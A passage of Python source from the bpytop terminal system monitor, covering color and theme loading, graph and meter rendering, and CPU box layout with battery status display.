def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}'
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
